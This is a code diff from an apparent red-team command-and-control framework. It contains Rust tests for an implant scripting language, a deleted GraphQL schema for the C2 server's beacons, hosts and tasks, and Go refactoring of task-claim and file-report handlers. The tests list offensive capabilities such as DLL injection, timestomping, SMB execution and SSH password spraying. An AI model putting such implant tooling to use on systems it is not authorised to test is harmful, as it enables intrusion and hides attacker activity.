{ + simple_run: TestCase{ + tome: Tome{ + eldritch: String::from("print(1+1)"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from("2"), + want_error: None, + }, + multi_print: TestCase { + tome: Tome{ + eldritch: String::from(r#"print("oceans "); print("rise, "); print("empires "); print("fall")"#), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"oceans rise, empires fall"#), + want_error: None, + }, + input_params: TestCase{ + tome: Tome { + eldritch: r#"print(input_params['cmd2'])"#.to_string(), + parameters: HashMap::from([ + ("cmd".to_string(), "id".to_string()), + ("cmd2".to_string(), "echo hello_world".to_string()), + ("cmd3".to_string(), "ls -lah /tmp/".to_string()), + ]), + file_names: Vec::new(), + }, + want_output: String::from("echo hello_world"), + want_error: None, + }, + file_bindings: TestCase { + tome: Tome { + eldritch: String::from("print(dir(file))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["append", "compress", "copy", "download", "exists", "find", "is_dir", "is_file", "list", "mkdir", "moveto", "read", "remove", "replace", "replace_all", "template", "timestomp", "write"]"#), + want_error: None, + }, + process_bindings: TestCase { + tome: Tome{ + eldritch: String::from("print(dir(process))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["info", "kill", "list", "name", "netstat"]"#), + want_error: None, + }, + sys_bindings: TestCase { + tome: Tome{ + eldritch: String::from("print(dir(sys))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["dll_inject", "dll_reflect", "exec", "get_env", "get_ip", "get_os", "get_pid", "get_reg", "get_user", "hostname", "is_linux", "is_macos", "is_windows", "shell", "write_reg_hex", "write_reg_int", "write_reg_str"]"#), + want_error: None, + }, + pivot_bindings: TestCase { + tome: Tome { + eldritch: String::from("print(dir(pivot))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["arp_scan", "bind_proxy", "ncat", "port_forward", "port_scan", "smb_exec", "ssh_copy", "ssh_exec", "ssh_password_spray"]"#), + want_error: None, + }, + assets_bindings: TestCase { + tome: Tome { + eldritch: String::from("print(dir(assets))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["copy", "list", "read", "read_binary"]"#), + want_error: None, + }, + crypto_bindings: TestCase { + tome: Tome { + eldritch: String::from("print(dir(crypto))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["aes_decrypt_file", "aes_encrypt_file", "decode_b64", "encode_b64", "from_json", "hash_file", "to_json"]"#), + want_error: None, + }, + time_bindings: TestCase { + tome: Tome { + eldritch: String::from("print(dir(time))"), + parameters: HashMap::new(), + file_names: Vec::new(), + }, + want_output: String::from(r#"["format_to_epoch", "format_to_readable", "now", "sleep"]"#), + want_error: None, + }, + } + + #[tokio::test(flavor = "multi_thread", worker_threads = 128)] + async fn test_library_async() -> anyhow::Result<()> { + // just using a temp file for its path + let tmp_file = NamedTempFile::new()?; + let path = String::from(tmp_file.path().to_str().unwrap()) + .clone() + .replace("\\", "\\\\"); + let eldritch = + format!(r#"file.download("https://www.google.com/", "{path}"); print("ok")"#); + let (runtime, 
output) = Runtime::new(); + let t = tokio::task::spawn_blocking(move || { + runtime.run(Tome { + eldritch, + parameters: HashMap::new(), + file_names: Vec::new(), + }); + }); + assert!(t.await.is_ok()); + + let out = output.collect(); + let err = output.collect_errors().pop(); + assert!( + err.is_none(), + "failed with err {}", + err.unwrap().to_string() + ); + assert!(tmp_file.as_file().metadata().unwrap().len() > 5); + assert_eq!("ok", out.join("")); + Ok(()) + } +} diff --git a/implants/lib/tavern/graphql/schema.graphql b/implants/lib/tavern/graphql/schema.graphql deleted file mode 100644 index 0b916671f..000000000 --- a/implants/lib/tavern/graphql/schema.graphql +++ /dev/null @@ -1,1081 +0,0 @@ -directive @requireRole(role: Role!) on FIELD_DEFINITION - -enum Role { - ADMIN - USER -}directive @goField(forceResolver: Boolean, name: String) on FIELD_DEFINITION | INPUT_FIELD_DEFINITION -directive @goModel(model: String, models: [String!]) on OBJECT | INPUT_OBJECT | SCALAR | ENUM | INTERFACE | UNION -type Beacon implements Node { - id: ID! - """A human readable identifier for the beacon.""" - name: String! - """The identity the beacon is authenticated as (e.g. 'root')""" - principal: String - """Unique identifier for the beacon. Unique to each instance of the beacon.""" - identifier: String! - """Identifies the agent that the beacon is running as (e.g. 'imix').""" - agentIdentifier: String - """Timestamp of when a task was last claimed or updated for the beacon.""" - lastSeenAt: Time - """Host this beacon is running on.""" - host: Host! - """Tasks that have been assigned to the beacon.""" - tasks: [Task!] -} -"""Ordering options for Beacon connections""" -input BeaconOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Beacons.""" - field: BeaconOrderField! -} -"""Properties by which Beacon connections can be ordered.""" -enum BeaconOrderField { - LAST_SEEN_AT -} -""" -BeaconWhereInput is used for filtering Beacon objects. -Input was generated by ent. -""" -input BeaconWhereInput { - not: BeaconWhereInput - and: [BeaconWhereInput!] - or: [BeaconWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """principal field predicates""" - principal: String - principalNEQ: String - principalIn: [String!] - principalNotIn: [String!] - principalGT: String - principalGTE: String - principalLT: String - principalLTE: String - principalContains: String - principalHasPrefix: String - principalHasSuffix: String - principalIsNil: Boolean - principalNotNil: Boolean - principalEqualFold: String - principalContainsFold: String - """identifier field predicates""" - identifier: String - identifierNEQ: String - identifierIn: [String!] - identifierNotIn: [String!] - identifierGT: String - identifierGTE: String - identifierLT: String - identifierLTE: String - identifierContains: String - identifierHasPrefix: String - identifierHasSuffix: String - identifierEqualFold: String - identifierContainsFold: String - """agent_identifier field predicates""" - agentIdentifier: String - agentIdentifierNEQ: String - agentIdentifierIn: [String!] - agentIdentifierNotIn: [String!] 
- agentIdentifierGT: String - agentIdentifierGTE: String - agentIdentifierLT: String - agentIdentifierLTE: String - agentIdentifierContains: String - agentIdentifierHasPrefix: String - agentIdentifierHasSuffix: String - agentIdentifierIsNil: Boolean - agentIdentifierNotNil: Boolean - agentIdentifierEqualFold: String - agentIdentifierContainsFold: String - """last_seen_at field predicates""" - lastSeenAt: Time - lastSeenAtNEQ: Time - lastSeenAtIn: [Time!] - lastSeenAtNotIn: [Time!] - lastSeenAtGT: Time - lastSeenAtGTE: Time - lastSeenAtLT: Time - lastSeenAtLTE: Time - lastSeenAtIsNil: Boolean - lastSeenAtNotNil: Boolean - """host edge predicates""" - hasHost: Boolean - hasHostWith: [HostWhereInput!] - """tasks edge predicates""" - hasTasks: Boolean - hasTasksWith: [TaskWhereInput!] -} -""" -CreateQuestInput is used for create Quest object. -Input was generated by ent. -""" -input CreateQuestInput { - """Name of the quest""" - name: String! - """Value of parameters that were specified for the quest (as a JSON string).""" - parameters: String - tomeID: ID! -} -""" -CreateTagInput is used for create Tag object. -Input was generated by ent. -""" -input CreateTagInput { - """Name of the tag""" - name: String! - """Describes the type of tag this is""" - kind: TagKind! - hostIDs: [ID!] -} -""" -CreateTomeInput is used for create Tome object. -Input was generated by ent. -""" -input CreateTomeInput { - """Name of the tome""" - name: String! - """Information about the tome""" - description: String! - """JSON string describing what parameters are used with the tome""" - paramDefs: String - """Eldritch script that will be executed when the tome is run""" - eldritch: String! - fileIDs: [ID!] -} -""" -Define a Relay Cursor type: -https://relay.dev/graphql/connections.htm#sec-Cursor -""" -scalar Cursor -type File implements Node { - id: ID! - """Timestamp of when this ent was created""" - createdAt: Time! - """Timestamp of when this ent was last updated""" - lastModifiedAt: Time! - """The name of the file, used to reference it for downloads""" - name: String! - """The size of the file in bytes""" - size: Int! - """A SHA3 digest of the content field""" - hash: String! -} -"""Ordering options for File connections""" -input FileOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Files.""" - field: FileOrderField! -} -"""Properties by which File connections can be ordered.""" -enum FileOrderField { - CREATED_AT - LAST_MODIFIED_AT - NAME - SIZE -} -""" -FileWhereInput is used for filtering File objects. -Input was generated by ent. -""" -input FileWhereInput { - not: FileWhereInput - and: [FileWhereInput!] - or: [FileWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """created_at field predicates""" - createdAt: Time - createdAtNEQ: Time - createdAtIn: [Time!] - createdAtNotIn: [Time!] - createdAtGT: Time - createdAtGTE: Time - createdAtLT: Time - createdAtLTE: Time - """last_modified_at field predicates""" - lastModifiedAt: Time - lastModifiedAtNEQ: Time - lastModifiedAtIn: [Time!] - lastModifiedAtNotIn: [Time!] - lastModifiedAtGT: Time - lastModifiedAtGTE: Time - lastModifiedAtLT: Time - lastModifiedAtLTE: Time - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] 
- nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """size field predicates""" - size: Int - sizeNEQ: Int - sizeIn: [Int!] - sizeNotIn: [Int!] - sizeGT: Int - sizeGTE: Int - sizeLT: Int - sizeLTE: Int - """hash field predicates""" - hash: String - hashNEQ: String - hashIn: [String!] - hashNotIn: [String!] - hashGT: String - hashGTE: String - hashLT: String - hashLTE: String - hashContains: String - hashHasPrefix: String - hashHasSuffix: String - hashEqualFold: String - hashContainsFold: String -} -type Host implements Node { - id: ID! - """Unique identifier for the host. Unique to each host.""" - identifier: String! - """A human readable identifier for the host.""" - name: String - """Primary interface IP address reported by the agent.""" - primaryIP: String - """Platform the agent is operating on.""" - platform: HostPlatform! - """Timestamp of when a task was last claimed or updated for the host.""" - lastSeenAt: Time - """Tags used to group this host with other hosts.""" - tags: [Tag!] - """Beacons that are present on this host system.""" - beacons: [Beacon!] -} -"""Ordering options for Host connections""" -input HostOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Hosts.""" - field: HostOrderField! -} -"""Properties by which Host connections can be ordered.""" -enum HostOrderField { - LAST_SEEN_AT -} -"""HostPlatform is enum for the field platform""" -enum HostPlatform @goModel(model: "realm.pub/tavern/internal/ent/host.Platform") { - Windows - Linux - MacOS - BSD - Unknown -} -""" -HostWhereInput is used for filtering Host objects. -Input was generated by ent. -""" -input HostWhereInput { - not: HostWhereInput - and: [HostWhereInput!] - or: [HostWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """identifier field predicates""" - identifier: String - identifierNEQ: String - identifierIn: [String!] - identifierNotIn: [String!] - identifierGT: String - identifierGTE: String - identifierLT: String - identifierLTE: String - identifierContains: String - identifierHasPrefix: String - identifierHasSuffix: String - identifierEqualFold: String - identifierContainsFold: String - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameIsNil: Boolean - nameNotNil: Boolean - nameEqualFold: String - nameContainsFold: String - """primary_ip field predicates""" - primaryIP: String - primaryIPNEQ: String - primaryIPIn: [String!] - primaryIPNotIn: [String!] - primaryIPGT: String - primaryIPGTE: String - primaryIPLT: String - primaryIPLTE: String - primaryIPContains: String - primaryIPHasPrefix: String - primaryIPHasSuffix: String - primaryIPIsNil: Boolean - primaryIPNotNil: Boolean - primaryIPEqualFold: String - primaryIPContainsFold: String - """platform field predicates""" - platform: HostPlatform - platformNEQ: HostPlatform - platformIn: [HostPlatform!] - platformNotIn: [HostPlatform!] - """last_seen_at field predicates""" - lastSeenAt: Time - lastSeenAtNEQ: Time - lastSeenAtIn: [Time!] - lastSeenAtNotIn: [Time!] 
- lastSeenAtGT: Time - lastSeenAtGTE: Time - lastSeenAtLT: Time - lastSeenAtLTE: Time - lastSeenAtIsNil: Boolean - lastSeenAtNotNil: Boolean - """tags edge predicates""" - hasTags: Boolean - hasTagsWith: [TagWhereInput!] - """beacons edge predicates""" - hasBeacons: Boolean - hasBeaconsWith: [BeaconWhereInput!] -} -""" -An object with an ID. -Follows the [Relay Global Object Identification Specification](https://relay.dev/graphql/objectidentification.htm) -""" -interface Node @goModel(model: "realm.pub/tavern/internal/ent.Noder") { - """The id of the object.""" - id: ID! -} -"""Possible directions in which to order a list of items when provided an `orderBy` argument.""" -enum OrderDirection { - """Specifies an ascending order for a given `orderBy` argument.""" - ASC - """Specifies a descending order for a given `orderBy` argument.""" - DESC -} -""" -Information about pagination in a connection. -https://relay.dev/graphql/connections.htm#sec-undefined.PageInfo -""" -type PageInfo { - """When paginating forwards, are there more items?""" - hasNextPage: Boolean! - """When paginating backwards, are there more items?""" - hasPreviousPage: Boolean! - """When paginating backwards, the cursor to continue.""" - startCursor: Cursor - """When paginating forwards, the cursor to continue.""" - endCursor: Cursor -} -type Query { - """Fetches an object given its ID.""" - node( - """ID of the object.""" - id: ID! - ): Node - """Lookup nodes by a list of IDs.""" - nodes( - """The list of node IDs.""" - ids: [ID!]! - ): [Node]! -} -type Quest implements Node { - id: ID! - """Timestamp of when this ent was created""" - createdAt: Time! - """Timestamp of when this ent was last updated""" - lastModifiedAt: Time! - """Name of the quest""" - name: String! - """Value of parameters that were specified for the quest (as a JSON string).""" - parameters: String - """Tome that this quest will be executing""" - tome: Tome! - """Bundle file that the executing tome depends on (if any)""" - bundle: File - """Tasks tracking the status and output of individual tome execution on targets""" - tasks: [Task!] - """User that created the quest if available.""" - creator: User -} -"""Ordering options for Quest connections""" -input QuestOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Quests.""" - field: QuestOrderField! -} -"""Properties by which Quest connections can be ordered.""" -enum QuestOrderField { - CREATED_AT - LAST_MODIFIED_AT - NAME -} -""" -QuestWhereInput is used for filtering Quest objects. -Input was generated by ent. -""" -input QuestWhereInput { - not: QuestWhereInput - and: [QuestWhereInput!] - or: [QuestWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """created_at field predicates""" - createdAt: Time - createdAtNEQ: Time - createdAtIn: [Time!] - createdAtNotIn: [Time!] - createdAtGT: Time - createdAtGTE: Time - createdAtLT: Time - createdAtLTE: Time - """last_modified_at field predicates""" - lastModifiedAt: Time - lastModifiedAtNEQ: Time - lastModifiedAtIn: [Time!] - lastModifiedAtNotIn: [Time!] - lastModifiedAtGT: Time - lastModifiedAtGTE: Time - lastModifiedAtLT: Time - lastModifiedAtLTE: Time - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] 
- nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """parameters field predicates""" - parameters: String - parametersNEQ: String - parametersIn: [String!] - parametersNotIn: [String!] - parametersGT: String - parametersGTE: String - parametersLT: String - parametersLTE: String - parametersContains: String - parametersHasPrefix: String - parametersHasSuffix: String - parametersIsNil: Boolean - parametersNotNil: Boolean - parametersEqualFold: String - parametersContainsFold: String - """tome edge predicates""" - hasTome: Boolean - hasTomeWith: [TomeWhereInput!] - """bundle edge predicates""" - hasBundle: Boolean - hasBundleWith: [FileWhereInput!] - """tasks edge predicates""" - hasTasks: Boolean - hasTasksWith: [TaskWhereInput!] - """creator edge predicates""" - hasCreator: Boolean - hasCreatorWith: [UserWhereInput!] -} -type Tag implements Node { - id: ID! - """Name of the tag""" - name: String! - """Describes the type of tag this is""" - kind: TagKind! - hosts: [Host!] -} -"""TagKind is enum for the field kind""" -enum TagKind @goModel(model: "realm.pub/tavern/internal/ent/tag.Kind") { - group - service -} -"""Ordering options for Tag connections""" -input TagOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Tags.""" - field: TagOrderField! -} -"""Properties by which Tag connections can be ordered.""" -enum TagOrderField { - NAME -} -""" -TagWhereInput is used for filtering Tag objects. -Input was generated by ent. -""" -input TagWhereInput { - not: TagWhereInput - and: [TagWhereInput!] - or: [TagWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """kind field predicates""" - kind: TagKind - kindNEQ: TagKind - kindIn: [TagKind!] - kindNotIn: [TagKind!] - """hosts edge predicates""" - hasHosts: Boolean - hasHostsWith: [HostWhereInput!] -} -type Task implements Node { - id: ID! - """Timestamp of when this ent was created""" - createdAt: Time! - """Timestamp of when this ent was last updated""" - lastModifiedAt: Time! - """Timestamp of when the task was claimed, null if not yet claimed""" - claimedAt: Time - """Timestamp of when execution of the task started, null if not yet started""" - execStartedAt: Time - """Timestamp of when execution of the task finished, null if not yet finished""" - execFinishedAt: Time - """Output from executing the task""" - output: String - """Error, if any, produced while executing the Task""" - error: String - quest: Quest! - beacon: Beacon! -} -"""Ordering options for Task connections""" -input TaskOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Tasks.""" - field: TaskOrderField! -} -"""Properties by which Task connections can be ordered.""" -enum TaskOrderField { - CREATED_AT - LAST_MODIFIED_AT - CLAIMED_AT - EXEC_STARTED_AT - EXEC_FINISHED_AT -} -""" -TaskWhereInput is used for filtering Task objects. -Input was generated by ent. -""" -input TaskWhereInput { - not: TaskWhereInput - and: [TaskWhereInput!] 
- or: [TaskWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """created_at field predicates""" - createdAt: Time - createdAtNEQ: Time - createdAtIn: [Time!] - createdAtNotIn: [Time!] - createdAtGT: Time - createdAtGTE: Time - createdAtLT: Time - createdAtLTE: Time - """last_modified_at field predicates""" - lastModifiedAt: Time - lastModifiedAtNEQ: Time - lastModifiedAtIn: [Time!] - lastModifiedAtNotIn: [Time!] - lastModifiedAtGT: Time - lastModifiedAtGTE: Time - lastModifiedAtLT: Time - lastModifiedAtLTE: Time - """claimed_at field predicates""" - claimedAt: Time - claimedAtNEQ: Time - claimedAtIn: [Time!] - claimedAtNotIn: [Time!] - claimedAtGT: Time - claimedAtGTE: Time - claimedAtLT: Time - claimedAtLTE: Time - claimedAtIsNil: Boolean - claimedAtNotNil: Boolean - """exec_started_at field predicates""" - execStartedAt: Time - execStartedAtNEQ: Time - execStartedAtIn: [Time!] - execStartedAtNotIn: [Time!] - execStartedAtGT: Time - execStartedAtGTE: Time - execStartedAtLT: Time - execStartedAtLTE: Time - execStartedAtIsNil: Boolean - execStartedAtNotNil: Boolean - """exec_finished_at field predicates""" - execFinishedAt: Time - execFinishedAtNEQ: Time - execFinishedAtIn: [Time!] - execFinishedAtNotIn: [Time!] - execFinishedAtGT: Time - execFinishedAtGTE: Time - execFinishedAtLT: Time - execFinishedAtLTE: Time - execFinishedAtIsNil: Boolean - execFinishedAtNotNil: Boolean - """output field predicates""" - output: String - outputNEQ: String - outputIn: [String!] - outputNotIn: [String!] - outputGT: String - outputGTE: String - outputLT: String - outputLTE: String - outputContains: String - outputHasPrefix: String - outputHasSuffix: String - outputIsNil: Boolean - outputNotNil: Boolean - outputEqualFold: String - outputContainsFold: String - """error field predicates""" - error: String - errorNEQ: String - errorIn: [String!] - errorNotIn: [String!] - errorGT: String - errorGTE: String - errorLT: String - errorLTE: String - errorContains: String - errorHasPrefix: String - errorHasSuffix: String - errorIsNil: Boolean - errorNotNil: Boolean - errorEqualFold: String - errorContainsFold: String - """quest edge predicates""" - hasQuest: Boolean - hasQuestWith: [QuestWhereInput!] - """beacon edge predicates""" - hasBeacon: Boolean - hasBeaconWith: [BeaconWhereInput!] -} -type Tome implements Node { - id: ID! - """Timestamp of when this ent was created""" - createdAt: Time! - """Timestamp of when this ent was last updated""" - lastModifiedAt: Time! - """Name of the tome""" - name: String! - """Information about the tome""" - description: String! - """JSON string describing what parameters are used with the tome""" - paramDefs: String - """Eldritch script that will be executed when the tome is run""" - eldritch: String! - """Any files required for tome execution that will be bundled and provided to the agent for download""" - files: [File!] -} -"""Ordering options for Tome connections""" -input TomeOrder { - """The ordering direction.""" - direction: OrderDirection! = ASC - """The field by which to order Tomes.""" - field: TomeOrderField! -} -"""Properties by which Tome connections can be ordered.""" -enum TomeOrderField { - CREATED_AT - LAST_MODIFIED_AT - NAME -} -""" -TomeWhereInput is used for filtering Tome objects. -Input was generated by ent. -""" -input TomeWhereInput { - not: TomeWhereInput - and: [TomeWhereInput!] - or: [TomeWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] 
- idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """created_at field predicates""" - createdAt: Time - createdAtNEQ: Time - createdAtIn: [Time!] - createdAtNotIn: [Time!] - createdAtGT: Time - createdAtGTE: Time - createdAtLT: Time - createdAtLTE: Time - """last_modified_at field predicates""" - lastModifiedAt: Time - lastModifiedAtNEQ: Time - lastModifiedAtIn: [Time!] - lastModifiedAtNotIn: [Time!] - lastModifiedAtGT: Time - lastModifiedAtGTE: Time - lastModifiedAtLT: Time - lastModifiedAtLTE: Time - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """description field predicates""" - description: String - descriptionNEQ: String - descriptionIn: [String!] - descriptionNotIn: [String!] - descriptionGT: String - descriptionGTE: String - descriptionLT: String - descriptionLTE: String - descriptionContains: String - descriptionHasPrefix: String - descriptionHasSuffix: String - descriptionEqualFold: String - descriptionContainsFold: String - """param_defs field predicates""" - paramDefs: String - paramDefsNEQ: String - paramDefsIn: [String!] - paramDefsNotIn: [String!] - paramDefsGT: String - paramDefsGTE: String - paramDefsLT: String - paramDefsLTE: String - paramDefsContains: String - paramDefsHasPrefix: String - paramDefsHasSuffix: String - paramDefsIsNil: Boolean - paramDefsNotNil: Boolean - paramDefsEqualFold: String - paramDefsContainsFold: String - """eldritch field predicates""" - eldritch: String - eldritchNEQ: String - eldritchIn: [String!] - eldritchNotIn: [String!] - eldritchGT: String - eldritchGTE: String - eldritchLT: String - eldritchLTE: String - eldritchContains: String - eldritchHasPrefix: String - eldritchHasSuffix: String - eldritchEqualFold: String - eldritchContainsFold: String - """files edge predicates""" - hasFiles: Boolean - hasFilesWith: [FileWhereInput!] -} -""" -UpdateBeaconInput is used for update Beacon object. -Input was generated by ent. -""" -input UpdateBeaconInput { - hostID: ID -} -""" -UpdateHostInput is used for update Host object. -Input was generated by ent. -""" -input UpdateHostInput { - """A human readable identifier for the host.""" - name: String - clearName: Boolean - addTagIDs: [ID!] - removeTagIDs: [ID!] - clearTags: Boolean - addBeaconIDs: [ID!] - removeBeaconIDs: [ID!] - clearBeacons: Boolean -} -""" -UpdateTagInput is used for update Tag object. -Input was generated by ent. -""" -input UpdateTagInput { - """Name of the tag""" - name: String - """Describes the type of tag this is""" - kind: TagKind - addHostIDs: [ID!] - removeHostIDs: [ID!] - clearHosts: Boolean -} -""" -UpdateUserInput is used for update User object. -Input was generated by ent. -""" -input UpdateUserInput { - """The name displayed for the user""" - name: String - """URL to the user's profile photo.""" - photoURL: String - """True if the user is active and able to authenticate""" - isActivated: Boolean - """True if the user is an Admin""" - isAdmin: Boolean -} -type User implements Node { - id: ID! - """The name displayed for the user""" - name: String! - """URL to the user's profile photo.""" - photoURL: String! - """True if the user is active and able to authenticate""" - isActivated: Boolean! - """True if the user is an Admin""" - isAdmin: Boolean! -} -""" -UserWhereInput is used for filtering User objects. 
-Input was generated by ent. -""" -input UserWhereInput { - not: UserWhereInput - and: [UserWhereInput!] - or: [UserWhereInput!] - """id field predicates""" - id: ID - idNEQ: ID - idIn: [ID!] - idNotIn: [ID!] - idGT: ID - idGTE: ID - idLT: ID - idLTE: ID - """name field predicates""" - name: String - nameNEQ: String - nameIn: [String!] - nameNotIn: [String!] - nameGT: String - nameGTE: String - nameLT: String - nameLTE: String - nameContains: String - nameHasPrefix: String - nameHasSuffix: String - nameEqualFold: String - nameContainsFold: String - """photo_url field predicates""" - photoURL: String - photoURLNEQ: String - photoURLIn: [String!] - photoURLNotIn: [String!] - photoURLGT: String - photoURLGTE: String - photoURLLT: String - photoURLLTE: String - photoURLContains: String - photoURLHasPrefix: String - photoURLHasSuffix: String - photoURLEqualFold: String - photoURLContainsFold: String - """is_activated field predicates""" - isActivated: Boolean - isActivatedNEQ: Boolean - """is_admin field predicates""" - isAdmin: Boolean - isAdminNEQ: Boolean -} -input ClaimTasksInput { - """The identity the beacon is authenticated as (e.g. 'root')""" - principal: String! - - """The hostname of the system the beacon is running on.""" - hostname: String! - - """The platform the agent is operating on.""" - hostPlatform: HostPlatform! - - """The IP address of the hosts primary interface (if available).""" - hostPrimaryIP: String - - """Unique identifier of the beacon, each running instance will be different.""" - beaconIdentifier: String! - - """Unique identifier of the underlying host system the beacon is running on.""" - hostIdentifier: String! - - """Name of the agent program the beacon is running as (e.g. 'imix')""" - agentIdentifier: String! -} - -input SubmitTaskResultInput { - """ID of the task to submit results for.""" - taskID: ID! - - """Timestamp of when the task execution began. Format as RFC3339Nano.""" - execStartedAt: Time! - - """Timestamp of when the task execution finished (set only if it has completed). Format as RFC3339Nano.""" - execFinishedAt: Time - - """ - Output captured as the result of task execution. - Submitting multiple outputs will result in appending new output to the previous output. - """ - output: String! - - """Error message captured as the result of task execution failure.""" - error: String -} -type Mutation { - ### - # Quest - ### - createQuest(beaconIDs: [ID!]!, input: CreateQuestInput!): Quest @requireRole(role: USER) - - ### - # Beacon - ### - updateBeacon(beaconID: ID!, input: UpdateBeaconInput!): Beacon! @requireRole(role: USER) - - ### - # Host - ### - updateHost(hostID: ID!, input: UpdateHostInput!): Host! @requireRole(role: USER) - - ### - # Tag - ### - createTag(input: CreateTagInput!): Tag! @requireRole(role: ADMIN) - updateTag(tagID: ID!, input: UpdateTagInput!): Tag! @requireRole(role: USER) - - ### - # Task - ### - claimTasks(input: ClaimTasksInput!,): [Task!]! - submitTaskResult(input: SubmitTaskResultInput!,): Task - - ### - # Tome - ### - createTome(input: CreateTomeInput!,): Tome! @requireRole(role: USER) - - ### - # User - ### - updateUser(userID: ID!, input: UpdateUserInput!): User @requireRole(role: ADMIN) -} -extend type Query { - files(where: FileWhereInput): [File!]! @requireRole(role: USER) - quests(where: QuestWhereInput): [Quest!]! @requireRole(role: USER) - tasks(where: TaskWhereInput): [Task!]! @requireRole(role: USER) - beacons(where: BeaconWhereInput): [Beacon!]! @requireRole(role: USER) - hosts(where: HostWhereInput): [Host!]! 
@requireRole(role: USER) - tags(where: TagWhereInput): [Tag!]! @requireRole(role: USER) - tomes(where: TomeWhereInput): [Tome!]! @requireRole(role: USER) - users(where: UserWhereInput): [User!]! @requireRole(role: USER) - me: User! -} -scalar Time diff --git a/tavern/internal/c2/api_claim_tasks.go b/tavern/internal/c2/api_claim_tasks.go index f5d4baa81..53c12f42a 100644 --- a/tavern/internal/c2/api_claim_tasks.go +++ b/tavern/internal/c2/api_claim_tasks.go @@ -10,6 +10,7 @@ import ( "google.golang.org/grpc/codes" "google.golang.org/grpc/status" "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/task" "realm.pub/tavern/internal/namegen" @@ -207,11 +208,13 @@ func (srv *Server) ClaimTasks(ctx context.Context, req *c2pb.ClaimTasksRequest) claimedFileNames = append(claimedFileNames, f.Name) } resp.Tasks = append(resp.Tasks, &c2pb.Task{ - Id: int64(claimedTask.ID), - Eldritch: claimedTome.Eldritch, - Parameters: params, - FileNames: claimedFileNames, - QuestName: claimedQuest.Name, + Id: int64(claimedTask.ID), + QuestName: claimedQuest.Name, + Tome: &epb.Tome{ + Eldritch: claimedTome.Eldritch, + Parameters: params, + FileNames: claimedFileNames, + }, }) } diff --git a/tavern/internal/c2/api_report_file.go b/tavern/internal/c2/api_report_file.go index 1b6439af1..f6d755aaf 100644 --- a/tavern/internal/c2/api_report_file.go +++ b/tavern/internal/c2/api_report_file.go @@ -36,28 +36,31 @@ func (srv *Server) ReportFile(stream c2pb.C2_ReportFileServer) error { } // Collect args + if req.Chunk == nil { + continue + } if taskID == 0 { taskID = req.GetTaskId() } if path == "" { - path = req.GetPath() + path = req.Chunk.GetPath() } if owner == "" { - owner = req.GetOwner() + owner = req.Chunk.GetOwner() } if group == "" { - group = req.GetGroup() + group = req.Chunk.GetGroup() } if permissions == "" { - permissions = req.GetPermissions() + permissions = req.Chunk.GetPermissions() } if size == 0 { - size = int(req.GetSize()) + size = int(req.Chunk.GetSize()) } if hash == "" { - hash = req.GetSha3_256Hash() + hash = req.Chunk.GetSha3_256Hash() } - content = append(content, req.GetChunk()...) + content = append(content, req.Chunk.GetChunk()...) 
